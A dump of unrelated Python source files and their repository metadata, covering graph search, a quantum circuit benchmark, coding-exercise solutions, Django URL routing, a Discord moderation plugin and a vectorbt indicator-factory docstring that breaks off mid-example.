while not frontier.empty():
current = frontier.get()
if current == goal:
break
for next in graph.neighbors(current):
new_cost = cost_so_far[current] + graph.cost(current, next)
if next not in cost_so_far or new_cost < cost_so_far[next]:
cost_so_far[next] = new_cost
priority = new_cost
frontier.put(next, priority)
came_from[next] = current
return came_from, cost_so_far
def reconstruct_path(came_from, start, goal):
current = goal
path = [current]
while current != start:
current = came_from[current]
path.append(current)
path.append(start) # optional
path.reverse() # optional
return path
def heuristic(a, b):
(x1, y1) = a
(x2, y2) = b
return abs(x1 - x2) + abs(y1 - y2)
def a_star_search(graph, start, goal):
frontier = PriorityQueue()
frontier.put(start, 0)
came_from = {}
cost_so_far = {}
came_from[start] = None
cost_so_far[start] = 0
while not frontier.empty():
current = frontier.get()
if current == goal:
break
for next in graph.neighbors(current):
new_cost = cost_so_far[current] + graph.cost(current, next)
if next not in cost_so_far or new_cost < cost_so_far[next]:
cost_so_far[next] = new_cost
priority = new_cost + heuristic(goal, next)
frontier.put(next, priority)
came_from[next] = current
return came_from, cost_so_far
| [
"[email protected]"
] | |
bbbb9c609651e91e3a3c15c139ff1b5813c22879 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startPyquil2333.py | c971dffe1465e621fa1a309de3e74ac9949af7f2 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,698 | py | # qubit number=4
# total number=29
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += CNOT(0,3) # number=14
prog += X(3) # number=15
prog += RX(1.8001325905069514,3) # number=18
prog += CNOT(0,3) # number=16
prog += H(1) # number=22
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += H(0) # number=5
prog += X(3) # number=24
prog += H(1) # number=6
prog += X(1) # number=25
prog += H(2) # number=7
prog += H(3) # number=8
prog += CNOT(1,0) # number=26
prog += Z(1) # number=27
prog += CNOT(1,0) # number=28
prog += H(0) # number=9
prog += CNOT(2,0) # number=10
prog += X(1) # number=17
prog += CNOT(2,0) # number=11
prog += Y(0) # number=12
prog += Y(0) # number=13
prog += CNOT(2,1) # number=23
prog += X(0) # number=19
prog += X(0) # number=20
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil2333.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"[email protected]"
] | |
fbddef4b9d48e173fddbe92424567a8926db63a3 | 94c7440e7f1d2fdbe4a1e26b9c75a94e49c14eb4 | /leetcode/303.py | 3e11c0d02ea85837838c1abfd9fcbb8f9d209292 | [
"Apache-2.0"
] | permissive | windniw/just-for-fun | 7ddea4f75cf3466a400b46efe36e57f6f7847c48 | 44e1ff60f8cfaf47e4d88988ee67808f0ecfe828 | refs/heads/master | 2022-08-18T09:29:57.944846 | 2022-07-25T16:04:47 | 2022-07-25T16:04:47 | 204,949,602 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | """
link: https://leetcode.com/problems/range-sum-query-immutable
problem: 离线计算数组区间和
solution: 转存 sum[:i]
"""
class NumArray:
def __init__(self, nums: List[int]):
self.s = [0 for _ in range(len(nums) + 1)]
for i in range(1, len(nums) + 1):
self.s[i] = self.s[i - 1] + nums[i - 1]
def sumRange(self, i: int, j: int) -> int:
return self.s[j + 1] - self.s[i]
| [
"[email protected]"
] | |
150ada0104f487967baa8037bdf9800d1d660c71 | d10c5d3603e027a8fd37115be05e62634ec0f0a5 | /13_Machine-Learning-with-Tree-Based-Models-in-Python/13_ex_1-12.py | 8bc8ee02a70ea444f217bbab5bc0d3c2c3a249c6 | [] | no_license | stacygo/2021-01_UCD-SCinDAE-EXS | 820049125b18b38ada49ffc2036eab33431d5740 | 027dc2d2878314fc8c9b2796f0c2e4c781c6668d | refs/heads/master | 2023-04-29T01:44:36.942448 | 2021-05-23T15:29:28 | 2021-05-23T15:29:28 | 335,356,448 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,032 | py | # Exercise 1-12: Linear regression vs regression tree
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.tree import DecisionTreeRegressor
from sklearn.metrics import mean_squared_error as MSE
SEED = 3
df = pd.read_csv('input/auto.csv')
y = df['mpg']
X = pd.get_dummies(df.drop(['mpg'], axis=1))
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=SEED)
dt = DecisionTreeRegressor(max_depth=8, min_samples_leaf=0.13, random_state=SEED)
dt.fit(X_train, y_train)
y_pred = dt.predict(X_test)
mse_dt = MSE(y_test, y_pred)
rmse_dt = mse_dt**(1/2)
lr = LinearRegression()
lr.fit(X_train, y_train)
# Predict test set labels
y_pred_lr = lr.predict(X_test)
# Compute mse_lr
mse_lr = MSE(y_test, y_pred_lr)
# Compute rmse_lr
rmse_lr = mse_lr**(1/2)
# Print rmse_lr
print('Linear Regression test set RMSE: {:.2f}'.format(rmse_lr))
# Print rmse_dt
print('Regression Tree test set RMSE: {:.2f}'.format(rmse_dt))
| [
"[email protected]"
] | |
f13dd503a9b25ec0cf197860872374891737e452 | 24c84c5b93cd816976d370a99982f45e0d18a184 | /ArraysProblem/Python/FindAllNumbersDisappearedinAnArray.py | 25420fb3ce55ce8bdb7c4beb3f9a49d0977405c8 | [] | no_license | purushottamkaushik/DataStructuresUsingPython | 4ef1cf33f1af3fd25105a45be4f179069e327628 | e016fe052c5600dcfbfcede986d173b401ed23fc | refs/heads/master | 2023-03-12T13:25:18.186446 | 2021-02-28T18:21:37 | 2021-02-28T18:21:37 | 343,180,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | class Solution:
def findDisappearedNumbers(self, nums):
lst = []
if not nums:
return lst
m = max(nums)
for i in range(len(nums)):
print(i)
if i+1 in nums:
continue
else:
lst.append(i+1)
return lst
def findDisappearedNumbers2(self, nums):
s = set(nums)
n = len(nums) + 1
lst = []
for i in range(1,n):
if i not in s:
lst.append(i)
return lst
s = Solution().findDisappearedNumbers([1,1])
print(s) | [
"[email protected]"
] | |
ce59e45ee8cddd99cedd8e16aefcff92641a326a | 8214e7369f2b86f19602eaffe9e8072f336391bb | /tasks.py | e4ab65a9167e0813e7287c98ba19959386973525 | [
"BSD-3-Clause"
] | permissive | pydev-git/cookiecutter_flask_docker | 27dc47e69a957bd89aeb76db13cc0a08897cd467 | 0bbe0f366d0d8d914b02518c94f5ff75d03386b5 | refs/heads/master | 2021-06-01T11:30:30.912658 | 2016-07-27T08:05:18 | 2016-07-27T08:05:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,184 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Invoke tasks."""
import os
import json
import shutil
from invoke import task, run
HERE = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(HERE, 'cookiecutter.json'), 'r') as fp:
COOKIECUTTER_SETTINGS = json.load(fp)
# Match default value of app_name from cookiecutter.json
COOKIE = os.path.join(HERE, COOKIECUTTER_SETTINGS['app_name'])
REQUIREMENTS = os.path.join(COOKIE, 'requirements', 'dev.txt')
@task
def build():
"""Build the cookiecutter."""
run('cookiecutter {0} --no-input'.format(HERE))
@task
def clean():
"""Clean out generated cookiecutter."""
if os.path.exists(COOKIE):
shutil.rmtree(COOKIE)
print('Removed {0}'.format(COOKIE))
else:
print('App directory does not exist. Skipping.')
def _run_manage_command(command):
run('python {0} {1}'.format(os.path.join(COOKIE, 'manage.py'), command), echo=True)
@task(pre=[clean, build])
def test():
"""Run lint commands and tests."""
run('pip install -r {0} --ignore-installed'.format(REQUIREMENTS), echo=True)
os.chdir(COOKIE)
_run_manage_command('lint')
_run_manage_command('test')
| [
"[email protected]"
] | |
e06215fdfb4e2456cf5f6f26ef24b108051d7371 | cd9eb87e3e1b04e6f421377eff02514de05c98e2 | /learn_SciPy/scikit-learn/User Guide/1. Supervised learning/1.10. Decision Trees.py | 2e0907d0cc61331fa0146ca0c4f1677688f35028 | [] | no_license | zhaojinxi/learn_python | 45f116f9729bbf19d9bb4a574b06e0ec41f754dc | 07b4a5a231e39b6d2c28f98e99a3a8fe3cb534c4 | refs/heads/master | 2021-06-05T22:00:02.528023 | 2020-03-22T04:19:22 | 2020-03-22T04:19:22 | 129,857,802 | 4 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,079 | py | import sklearn.tree
import sklearn.datasets
import graphviz
#1.10.1. Classification
X = [[0, 0], [1, 1]]
Y = [0, 1]
clf = sklearn.tree.DecisionTreeClassifier()
clf = clf.fit(X, Y)
clf.predict([[2., 2.]])
clf.predict_proba([[2., 2.]])
iris = sklearn.datasets.load_iris()
clf = sklearn.tree.DecisionTreeClassifier()
clf = clf.fit(iris.data, iris.target)
dot_data = sklearn.tree.export_graphviz(clf, out_file=None)
graph = graphviz.Source(dot_data)
graph.render("iris")
dot_data = sklearn.tree.export_graphviz(clf, out_file=None, feature_names=iris.feature_names, class_names=iris.target_names, filled=True, rounded=True, special_characters=True)
graph = graphviz.Source(dot_data)
graph
clf.predict(iris.data[:1, :])
clf.predict_proba(iris.data[:1, :])
#1.10.2. Regression
X = [[0, 0], [2, 2]]
y = [0.5, 2.5]
clf = sklearn.tree.DecisionTreeRegressor()
clf = clf.fit(X, y)
clf.predict([[1, 1]])
#1.10.3. Multi-output problems
#1.10.4. Complexity
#1.10.5. Tips on practical use
#1.10.6. Tree algorithms: ID3, C4.5, C5.0 and CART
#1.10.7. Mathematical formulation | [
"[email protected]"
] | |
ab37819178678efc8832a481c7d0f60c89cf7dfe | c27e78d35cdc802e4790280c384a0f97acf636ef | /src/rulesTest.py | c7cda2cbd1a74e52e447aefbc5576b0f6f3b5dc3 | [] | no_license | undersea/Special_Topic | 99e424d9e443523a4d880ef478455bb75d7c82cd | 7bf7ed2c92b864d99790b927965bad819bfb7cfb | refs/heads/master | 2020-03-25T04:01:26.909441 | 2011-05-30T03:26:53 | 2011-05-30T03:26:53 | 3,587,506 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | from unittest import TestCase, main
from rules import Degree
class TestRules(TestCase):
def setUp(self):
print "setUp"
self.rules = Degree()
pass
def tearDown(self):
print "tearDown"
del self.rules
pass
def testAdd(self):
count = len(self.rules.rules)
rule = ("one of","one")
self.rules.add(rule)
self.assertEqual(count, 0)
self.assertEqual(len(self.rules.rules), 1)
def testDelete(self):
rule = ("one of","one")
self.rules.rules.append(rule)
count = len(self.rules.rules)
self.assertEqual(count, 1)
self.rules.delete(rule)
self.assertEqual(len(self.rules.rules), 0)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
4698bbd10d6f9865b9e14c4ccd5f0c59b5bd7996 | 8f506513cb73d9bdb5dbdd9084aaba020b1efbea | /Course_1-Algorithmic_Toolbox/Week-1/Excercise_Challenges/2_maximum_pairwise_product/max_pairwise_product.py | 16ef706e59671dba4d782c766223be8cf322274f | [] | no_license | KhanAjmal007/Data-Structures-and-Algorithms-Specialization-Coursera | 1255ecf877ecd4a91bda8b85e9c96566fe6d5e4d | ab6e618c5d8077febb072091e80c16f5f1a15465 | refs/heads/master | 2023-03-21T04:18:04.580423 | 2020-07-11T07:18:06 | 2020-07-11T07:18:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | def max_pairwise_product(numbers):
max1 = -999
max2 = -9999
for value in numbers:
if value > max1:
max2 = max1
max1 = value
elif value > max2:
max2 = value
return max1 * max2
if __name__ == '__main__':
input_n = int(input())
input_numbers = [int(x) for x in input().split()]
print(max_pairwise_product(input_numbers))
| [
"[email protected]"
] | |
f2f4d6b715cc9b11ba5174b51906804ad1a1ca7e | 544cfadc742536618168fc80a5bd81a35a5f2c99 | /tools/external_updater/base_updater.py | 18d4435858c7a22b295ca26455f4abbaf44d16d4 | [] | no_license | ZYHGOD-1/Aosp11 | 0400619993b559bf4380db2da0addfa9cccd698d | 78a61ca023cbf1a0cecfef8b97df2b274ac3a988 | refs/heads/main | 2023-04-21T20:13:54.629813 | 2021-05-22T05:28:21 | 2021-05-22T05:28:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,590 | py | # Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base class for all updaters."""
from pathlib import Path
import fileutils
# pylint: disable=import-error
import metadata_pb2 # type: ignore
class Updater:
"""Base Updater that defines methods common for all updaters."""
def __init__(self, proj_path: Path, old_url: metadata_pb2.URL,
old_ver: str) -> None:
self._proj_path = fileutils.get_absolute_project_path(proj_path)
self._old_url = old_url
self._old_ver = old_ver
self._new_url = metadata_pb2.URL()
self._new_url.CopyFrom(old_url)
self._new_ver = old_ver
self._has_errors = False
def is_supported_url(self) -> bool:
"""Returns whether the url is supported."""
raise NotImplementedError()
def check(self) -> None:
"""Checks whether a new version is available."""
raise NotImplementedError()
def update(self) -> None:
"""Updates the package.
Has to call check() before this function.
"""
raise NotImplementedError()
@property
def project_path(self) -> Path:
"""Gets absolute path to the project."""
return self._proj_path
@property
def current_version(self) -> str:
"""Gets the current version."""
return self._old_ver
@property
def current_url(self) -> metadata_pb2.URL:
"""Gets the current url."""
return self._old_url
@property
def latest_version(self) -> str:
"""Gets latest version."""
return self._new_ver
@property
def latest_url(self) -> metadata_pb2.URL:
"""Gets URL for latest version."""
return self._new_url
@property
def has_errors(self) -> bool:
"""Gets whether this update had an error."""
return self._has_errors
def use_current_as_latest(self):
"""Uses current version/url as the latest to refresh project."""
self._new_ver = self._old_ver
self._new_url = self._old_url
| [
"[email protected]"
] | |
a85110d0091d407c2364cee12549f5de1adf8a07 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5744014401732608_0/Python/ArbokEkans/C.py | 413f74cc89b84cfd4dc8d0ba77d001600a4d53ea | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 979 | py | def solve():
b, m = [int(i) for i in input().split()]
if m > 2**(b-2):
return "IMPOSSIBLE"
else:
graph = construct(b)
rep = bin(m)[2:][::-1]
if m == 2**(b-2):
for key in graph:
if key != b-1:
graph[key].append(b-1)
else:
for i, digit in enumerate(rep):
if digit == "1":
graph[i+1].append(b-1)
res = ["POSSIBLE"]
for i in range(b):
row = []
for j in range(b):
if j in graph[i]:
row.append(1)
else:
row.append(0)
res.append(''.join(str(x) for x in row))
return '\n'.join(res)
def construct(b):
d = {i:list(range(i+1,b-1)) for i in range(b) }
return d
n_cases = int(input())
for n_case in range(n_cases):
print("Case #{}: {}".format(n_case+1, solve()))
| [
"[email protected]"
] | |
36b479f0a4a7e4c24279afbf988d9396960305bd | 81a9840c702927b4ca9ef17b766064f1d3c9139d | /mantabot/apps/moderation/handlers/readonly.py | 212eafdce5f9d13f3499cb72f207fa73becc05d9 | [
"MIT"
] | permissive | spectras/mantabot | 58b2d996ccd359c7720006b87ab94db1ac07956f | 9b2de297d46224d66a84b8925e09cc209d8b37d4 | refs/heads/master | 2020-03-19T12:42:20.893443 | 2018-06-07T23:25:09 | 2018-06-07T23:25:09 | 136,534,522 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | import discord
from mantabot.apps.moderation import service
class ReadOnly(object):
""" Simple plugin that deletes messages sent to some channels """
name = 'moderation.readonly'
def __init__(self, client):
self.client = client
async def on_message(self, message):
channel = message.channel
if not isinstance(channel, discord.abc.GuildChannel):
return
if message.author.bot:
return
# Handle readonly
if await service.get_readonly(channel):
try:
await message.delete()
except discord.NotFound:
pass # this is okay, message is already deleted
except discord.Forbidden:
await service.set_readonly(channel, False, user=channel.guild.me, reason='forbidden')
# Handle mutes
if await service.get_channel_member_muted(channel, message.author):
try:
await message.delete()
except (discord.NotFound, discord.Forbidden):
pass
| [
"[email protected]"
] | |
18426ac763d7a141d3556b448fb271532e0d54af | 3c3095585c075002b707475b49bdd8d8c7d4b71d | /InvenTree/InvenTree/urls.py | d9600333f4698fcd539486876a45dfd4ae42af04 | [
"MIT"
] | permissive | andyseracuse/InvenTree | ffa7c0a2d131b363c0b93c2d888a9a89c0048bf7 | c5166ec845ffe9477ab488931775dcdfd1dce7e7 | refs/heads/master | 2022-06-08T12:54:11.522718 | 2020-04-20T09:30:58 | 2020-04-20T09:30:58 | 258,296,796 | 0 | 0 | MIT | 2020-04-23T18:33:12 | 2020-04-23T18:33:11 | null | UTF-8 | Python | false | false | 4,211 | py | """
Top-level URL lookup for InvenTree application.
Passes URL lookup downstream to each app as required.
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.auth import views as auth_views
from qr_code import urls as qr_code_urls
from company.urls import company_urls
from company.urls import supplier_part_urls
from company.urls import price_break_urls
from common.urls import common_urls
from part.urls import part_urls
from stock.urls import stock_urls
from build.urls import build_urls
from order.urls import order_urls
from common.api import common_api_urls
from part.api import part_api_urls, bom_api_urls
from company.api import company_api_urls
from stock.api import stock_api_urls
from build.api import build_api_urls
from order.api import po_api_urls
from django.conf import settings
from django.conf.urls.static import static
from django.views.generic.base import RedirectView
from rest_framework.documentation import include_docs_urls
from .views import IndexView, SearchView, DatabaseStatsView
from .views import SettingsView, EditUserView, SetPasswordView
from .api import InfoView, BarcodePluginView, ActionPluginView
from users.urls import user_urls
admin.site.site_header = "InvenTree Admin"
apipatterns = [
url(r'^common/', include(common_api_urls)),
url(r'^part/', include(part_api_urls)),
url(r'^bom/', include(bom_api_urls)),
url(r'^company/', include(company_api_urls)),
url(r'^stock/', include(stock_api_urls)),
url(r'^build/', include(build_api_urls)),
url(r'^po/', include(po_api_urls)),
# User URLs
url(r'^user/', include(user_urls)),
# Plugin endpoints
url(r'^barcode/', BarcodePluginView.as_view(), name='api-barcode-plugin'),
url(r'^action/', ActionPluginView.as_view(), name='api-action-plugin'),
# InvenTree information endpoint
url(r'^$', InfoView.as_view(), name='api-inventree-info'),
]
settings_urls = [
url(r'^user/?', SettingsView.as_view(template_name='InvenTree/settings/user.html'), name='settings-user'),
url(r'^currency/?', SettingsView.as_view(template_name='InvenTree/settings/currency.html'), name='settings-currency'),
url(r'^part/?', SettingsView.as_view(template_name='InvenTree/settings/part.html'), name='settings-part'),
url(r'^other/?', SettingsView.as_view(template_name='InvenTree/settings/other.html'), name='settings-other'),
# Catch any other urls
url(r'^.*$', SettingsView.as_view(template_name='InvenTree/settings/user.html'), name='settings'),
]
urlpatterns = [
url(r'^part/', include(part_urls)),
url(r'^supplier-part/', include(supplier_part_urls)),
url(r'^price-break/', include(price_break_urls)),
url(r'^common/', include(common_urls)),
url(r'^stock/', include(stock_urls)),
url(r'^company/', include(company_urls)),
url(r'^order/', include(order_urls)),
url(r'^build/', include(build_urls)),
url(r'^auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^login/', auth_views.LoginView.as_view(), name='login'),
url(r'^logout/', auth_views.LogoutView.as_view(template_name='registration/logout.html'), name='logout'),
url(r'^settings/', include(settings_urls)),
url(r'^edit-user/', EditUserView.as_view(), name='edit-user'),
url(r'^set-password/', SetPasswordView.as_view(), name='set-password'),
url(r'^admin/', admin.site.urls, name='inventree-admin'),
url(r'^qr_code/', include(qr_code_urls, namespace='qr_code')),
url(r'^index/', IndexView.as_view(), name='index'),
url(r'^search/', SearchView.as_view(), name='search'),
url(r'^stats/', DatabaseStatsView.as_view(), name='stats'),
url(r'^api/', include(apipatterns)),
url(r'^api-doc/', include_docs_urls(title='InvenTree API')),
url(r'^markdownx/', include('markdownx.urls')),
]
# Static file access
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
# Media file access
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# Send any unknown URLs to the parts page
urlpatterns += [url(r'^.*$', RedirectView.as_view(url='/index/', permanent=False), name='index')]
| [
"[email protected]"
] | |
e2a811d5af7d9c83a519a178aba99267740a9328 | 0b793bce2da8c3d09b7956c0672ddbffd46feaed | /atcoder/corp/ddcc2016_qa.py | 1c35c9661ac08bed450194c2318fc510b368dd9d | [
"MIT"
] | permissive | knuu/competitive-programming | c6c4e08fb231937d988bdc5a60a8ad6b31b97616 | 16bc68fdaedd6f96ae24310d697585ca8836ab6e | refs/heads/master | 2021-01-17T09:39:02.647688 | 2020-11-07T03:17:22 | 2020-11-07T03:17:22 | 27,886,732 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 71 | py | A, B, C = map(int, input().split())
print('{:.20f}'.format(C * B / A))
| [
"[email protected]"
] | |
8fddcccf8a50a7b00db56be3a20a3f31347fac88 | 82d588161a8f8cd27c3031c779120ea4380791b9 | /yejin/삼성 SW 역량 테스트 기출 문제/2021 하반기/13458.py | 0e77a2dfcaf4b39f4e2dc3fcea152240ebab6c5f | [] | no_license | Yejin6911/Algorithm_Study | 3aa02a7d07169382a78c049d1de8251a52da816c | 98c968bfeed17ab6b62e3a077280e0310f08190a | refs/heads/master | 2023-09-01T00:31:07.212413 | 2021-10-24T07:56:21 | 2021-10-24T07:56:21 | 345,009,057 | 1 | 1 | null | 2021-09-20T13:08:33 | 2021-03-06T04:57:34 | Python | UTF-8 | Python | false | false | 343 | py | import sys
import math
input = sys.stdin.readline
n = int(input())
A = list(map(int, input().split()))
B, C = map(int, input().split())
total = n
# 총감독관 감시 인원 제외
for i in range(n):
if A[i] <= B:
A[i] = 0
else:
A[i] -= B
# 부감독관 인원 계산
total += math.ceil(A[i]/C)
print(total)
| [
"[email protected]"
] | |
53d2dffde18c9980be149e87a501fe5b3b978137 | e45efaf397712245b337d053a0fe2b388674e74d | /vectorbt/indicators/factory.py | 86266b73a949c1c2384a25d4b5828ceb362f5c90 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hiddenvs/vectorbt | 35efc95bf7c5cc6b84917c11c988c3e07ff3ed44 | 44968ac579a1420f713df326eb730bae93041622 | refs/heads/master | 2023-03-30T15:34:53.424776 | 2021-03-25T21:50:33 | 2021-03-25T21:50:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129,901 | py | """A factory for building new indicators with ease.
The indicator factory class `IndicatorFactory` offers a convenient way to create technical
indicators of any complexity. By providing it with information such as calculation functions and
the names of your inputs, parameters, and outputs, it will create a stand-alone indicator class
capable of running the indicator for an arbitrary combination of your inputs and parameters. It also
creates methods for signal generation and supports common pandas and parameter indexing operations.
Each indicator is basically a pipeline that:
* Accepts a list of input arrays (for example, OHLCV data)
* Accepts a list of parameter arrays (for example, window size)
* Accepts other relevant arguments and keyword arguments
* For each parameter combination, performs calculation on the input arrays
* Concatenates results into new output arrays (for example, rolling average)
This pipeline can be well standardized, which is done by `run_pipeline`.
`IndicatorFactory` simplifies the usage of `run_pipeline` by generating and pre-configuring
a new Python class with various class methods for running the indicator.
Each generated class includes the following features:
* Accepts input arrays of any compatible shape thanks to broadcasting
* Accepts output arrays written in-place instead of returning
* Accepts arbitrary parameter grids
* Supports caching and other optimizations out of the box
* Supports pandas and parameter indexing
* Offers helper methods for all inputs, outputs, and properties
Consider the following price DataFrame composed of two columns, one per asset:
```python-repl
>>> import vectorbt as vbt
>>> import numpy as np
>>> import pandas as pd
>>> from numba import njit
>>> from datetime import datetime
>>> price = pd.DataFrame({
... 'a': [1, 2, 3, 4, 5],
... 'b': [5, 4, 3, 2, 1]
... }, index=pd.Index([
... datetime(2020, 1, 1),
... datetime(2020, 1, 2),
... datetime(2020, 1, 3),
... datetime(2020, 1, 4),
... datetime(2020, 1, 5),
... ])).astype(float)
>>> price
a b
2020-01-01 1.0 5.0
2020-01-02 2.0 4.0
2020-01-03 3.0 3.0
2020-01-04 4.0 2.0
2020-01-05 5.0 1.0
```
For each column in the DataFrame, let's calculate a simple moving average and get its
crossover with price. In particular, we want to test two different window sizes: 2 and 3.
## Naive approach
A naive way of doing this:
```python-repl
>>> ma_df = pd.DataFrame.vbt.concat(
... price.rolling(window=2).mean(),
... price.rolling(window=3).mean(),
... keys=pd.Index([2, 3], name='ma_window'))
>>> ma_df
ma_window 2 3
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 1.5 4.5 NaN NaN
2020-01-03 2.5 3.5 2.0 4.0
2020-01-04 3.5 2.5 3.0 3.0
2020-01-05 4.5 1.5 4.0 2.0
>>> above_signals = (price.vbt.tile(2).vbt > ma_df)
>>> above_signals = above_signals.vbt.signals.first(after_false=True)
>>> above_signals
ma_window 2 3
a b a b
2020-01-01 False False False False
2020-01-02 True False False False
2020-01-03 False False True False
2020-01-04 False False False False
2020-01-05 False False False False
>>> below_signals = (price.vbt.tile(2).vbt < ma_df)
>>> below_signals = below_signals.vbt.signals.first(after_false=True)
>>> below_signals
ma_window 2 3
a b a b
2020-01-01 False False False False
2020-01-02 False True False False
2020-01-03 False False False True
2020-01-04 False False False False
2020-01-05 False False False False
```
Now the same using `IndicatorFactory`:
```python-repl
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window'],
... output_names=['ma'],
... ).from_apply_func(vbt.nb.rolling_mean_nb)
>>> myind = MyInd.run(price, [2, 3])
>>> above_signals = myind.price_above(myind.ma, crossover=True)
>>> below_signals = myind.price_below(myind.ma, crossover=True)
```
The `IndicatorFactory` class is used to construct indicator classes from UDFs. First, we provide
all the necessary information (indicator conig) to build the facade of the indicator, such as the names
of inputs, parameters, and outputs, and the actual calculation function. The factory then generates a
self-contained indicator class capable of running arbitrary configurations of inputs and parameters.
To run any configuration, we can either use the `run` method (as we did above) or the `run_combs` method.
## run and run_combs methods
The main method to run an indicator is `run`, which accepts arguments based on the config
provided to the `IndicatorFactory` (see the example above). These arguments include input arrays,
in-place output arrays, parameters, and arguments for `run_pipeline`.
The `run_combs` method takes the same inputs as the method above, but computes all combinations
of passed parameters based on a combinatorial function and returns multiple instances that
can be compared with each other. For example, this is useful to generate crossover signals
of multiple moving averages:
```python-repl
>>> myind1, myind2 = MyInd.run_combs(price, [2, 3, 4])
>>> myind1.ma
myind_1_window 2 3
a b a b a b
2020-01-01 NaN NaN NaN NaN NaN NaN
2020-01-02 1.5 4.5 1.5 4.5 NaN NaN
2020-01-03 2.5 3.5 2.5 3.5 2.0 4.0
2020-01-04 3.5 2.5 3.5 2.5 3.0 3.0
2020-01-05 4.5 1.5 4.5 1.5 4.0 2.0
>>> myind2.ma
myind_2_window 3 4
a b a b a b
2020-01-01 NaN NaN NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN NaN NaN
2020-01-03 2.0 4.0 NaN NaN NaN NaN
2020-01-04 3.0 3.0 2.5 3.5 2.5 3.5
2020-01-05 4.0 2.0 3.5 2.5 3.5 2.5
>>> myind1.ma_above(myind2.ma, crossover=True)
myind_1_window 2 3
myind_2_window 3 4 4
a b a b a b
2020-01-01 False False False False False False
2020-01-02 False False False False False False
2020-01-03 True False False False False False
2020-01-04 False False True False True False
2020-01-05 False False False False False False
```
Its main advantage is that it doesn't need to re-compute each combination thanks to smart caching.
To get details on what arguments are accepted by any of the class methods, use `help`:
```python-repl
>>> help(MyInd.run)
Help on method run:
run(price, window, short_name='custom', hide_params=None, hide_default=True, **kwargs) method of builtins.type instance
Run `Indicator` indicator.
* Inputs: `price`
* Parameters: `window`
* Outputs: `ma`
Pass a list of parameter names as `hide_params` to hide their column levels.
Set `hide_default` to False to show the column levels of the parameters with a default value.
Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`.
```
## Parameters
`IndicatorFactory` allows definition of arbitrary parameter grids.
Parameters are variables that can hold one or more values. A single value can be passed as a
scalar, an array, or any other object. Multiple values are passed as a list or an array
(if the flag `is_array_like` is set to False for that parameter). If there are multiple parameters
and each is having multiple values, their values will broadcast to a single shape:
```plaintext
p1 p2 result
0 0 1 [(0, 1)]
1 [0, 1] [2] [(0, 2), (1, 2)]
2 [0, 1] [2, 3] [(0, 2), (1, 3)]
```
To illustrate the usage of parameters in indicators, let's build a basic indicator that returns 1
if the rolling mean is within upper and lower bounds, and -1 if it's outside:
```python-repl
>>> @njit
... def apply_func_nb(price, window, lower, upper):
... output = np.full(price.shape, np.nan, dtype=np.float_)
... for col in range(price.shape[1]):
... for i in range(window, price.shape[0]):
... mean = np.mean(price[i - window:i, col])
... output[i, col] = lower < mean < upper
... return output
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window', 'lower', 'upper'],
... output_names=['output']
... ).from_apply_func(apply_func_nb)
```
By default, when `per_column` is set to False, each parameter is applied to the entire input.
One parameter combination:
```python-repl
